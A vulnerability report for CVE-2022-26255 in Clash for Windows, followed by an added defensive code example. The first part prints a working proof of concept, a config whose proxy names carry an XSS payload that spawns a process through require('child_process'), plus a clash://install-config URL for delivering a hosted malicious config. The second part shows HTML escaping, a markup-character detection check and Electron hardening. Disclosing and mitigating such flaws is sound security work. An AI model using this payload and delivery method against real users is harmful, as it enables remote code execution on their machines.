CVE-2022-26255: [Bug]: Remote Code Execution · Issue #2710 · Fndroid/clash_for_windows_pkg
Clash for Windows v0.19.8 was discovered to allow arbitrary code execution via a crafted payload injected into the Proxies name column.
Clash for Windows is built on Electron. If an XSS payload is placed in the name of a proxy, arbitrary JavaScript can be executed remotely on the victim's computer.
Affected version: 0.19.8 (there are other triggers for this vulnerability in version 0.19.9; that is, exactly 0.19.9).
```yaml
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true
proxy-groups:
  - name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: select
    proxies:
      - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
```
Host the malicious config file on the internet and use a clash:// URL to install it; clash_for_windows_pkg will download the file and switch to it automatically.
clash://install-config?url=http%3A%2F%2F1.1.1.1%3A8888%2F1.txt&name=RCE
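The root cause described above is a proxy name from an untrusted config being interpolated into the renderer's DOM as HTML, in a renderer where `require("child_process")` is reachable. The following is an added example, not code from clash_for_windows_pkg: it contrasts the unsafe interpolation with an escaped rendering, and adds a load-time check that flags names containing markup characters. The row markup, the `findSuspiciousNames` helper and the sample config are assumptions constructed for illustration.

```javascript
// Added example (not from the clash_for_windows_pkg project). Assumes proxy and
// proxy-group names arrive from the parsed YAML as plain strings.

// Unsafe: the name is interpolated straight into markup. A name containing
// HTML is parsed as HTML, so an <img onerror=...> handler runs in the renderer;
// with nodeIntegration enabled that handler can reach require("child_process").
function renderProxyRowUnsafe(name) {
  return `<tr><td class="proxy-name">${name}</td></tr>`;
}

// Mitigation 1: escape the HTML metacharacters before interpolation so the
// name is displayed verbatim and never parsed as markup.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}
function renderProxyRowSafe(name) {
  return `<tr><td class="proxy-name">${escapeHtml(name)}</td></tr>`;
}

// Mitigation 2 (defence in depth): at config load time, report proxy and
// proxy-group names that contain markup characters so a crafted config can be
// rejected before it reaches the UI. Deliberately conservative: an apostrophe
// in a name is flagged too.
const MARKUP_CHARS = /[<>"'`]/;
function findSuspiciousNames(config) {
  const names = [];
  for (const p of config.proxies || []) names.push(p.name);
  for (const g of config["proxy-groups"] || []) names.push(g.name);
  return names.filter((n) => typeof n === "string" && MARKUP_CHARS.test(n));
}

// Constructed sample mirroring the shape of the PoC config; the payload here is
// a harmless alert(), not the command from the report.
const SAMPLE_CONFIG = {
  proxies: [
    { name: 'a<img/src="1"/onerror=alert(1)>', type: "socks5", server: "127.0.0.1", port: "17938" },
    { name: "abc", type: "socks5", server: "127.0.0.1", port: "8088" },
  ],
  "proxy-groups": [{ name: "auto", type: "select", proxies: ["abc"] }],
};

// Names that would be rejected at load time for the sample above.
const SUSPICIOUS_NAMES = findSuspiciousNames(SAMPLE_CONFIG);
```

Escaping fixes the rendering sink; disabling `nodeIntegration` and enabling `contextIsolation` in the Electron window additionally removes the `require` bridge the payload depends on, so a residual XSS cannot spawn processes.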